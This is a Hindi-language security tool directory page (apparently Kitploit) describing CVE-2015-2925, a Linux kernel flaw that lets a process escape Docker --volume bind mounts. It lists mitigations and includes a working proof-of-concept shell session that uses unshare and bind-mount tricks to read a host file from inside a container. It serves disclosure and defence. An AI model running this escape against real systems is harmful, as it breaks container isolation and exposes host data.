Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
docker_cve-2015-2925 — Docker + CVE-2015-2925 = --volume से बच निकलना | Kitploit
उपकरण/GitHubGitHub/kagami/docker_cve-2015-2925
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगकंटेनर एस्केप
GitHubkagami/docker_cve-2015-2925

docker_cve-2015-2925

Docker + CVE-2015-2925 = --volume से बच निकलना

रिपॉजिटरी देखें
11211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Docker + CVE-2015-2925 = --volume से बच निकलना

लिनक्स में हालिया कमज़ोरी जो लगभग आधे साल (कई महीनों से सार्वजनिक) से ज्ञात है, ने bind mounts से बच निकलना संभव बना दिया है। विशेष रूप से Docker के मामले में, --volume विकल्प के माध्यम से माउंट किए गए निर्देशिका के अंदर से संबंधित होस्ट के फ़ाइलसिस्टम तक बच निकलना संभव है।

Docker सुरक्षा टीम पहले से ही अवगत है इस मुद्दे से और इसे सार्वजनिक ध्यान आकर्षित करने के लिए प्रकाशित करने की अनुमति दी गई।

Jann Horn को इस बात को इंगित करने के लिए धन्यवाद, मूलतः मैंने इसे पुन: प्रस्तुत किया।

निवारण

इनमें से कोई भी पर्याप्त होगा:

  • AppArmor-सक्षम कर्नेल और AppArmor Docker प्रोफ़ाइल
  • SELinux-सक्षम कर्नेल और SELinux Docker नीति
  • कर्नेल में उपयोगकर्ता नामस्थान अक्षम

टिप्पणियाँ

  • यह अभी तक अपस्ट्रीम और डिस्ट्रो में ठीक नहीं किया गया है और किसी भी हाल के कर्नेल पर काम करना चाहिए
  • इसके लिए कंटेनर के अंदर रूट की आवश्यकता नहीं है
  • विभिन्न डिस्ट्रो util-linux पैकेज के अलग-अलग संस्करण प्रदान करते हैं जिसका unshare(1) हिस्सा है और यह आपके मामले में "Operation not permitted" लौटा सकता है; Debian Jessie से पैकेज का परीक्षण किया गया और उम्मीद के मुताबिक काम किया

प्रमाण की अवधारणा

root@kitploit:~
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
टूल डाउनलोड करें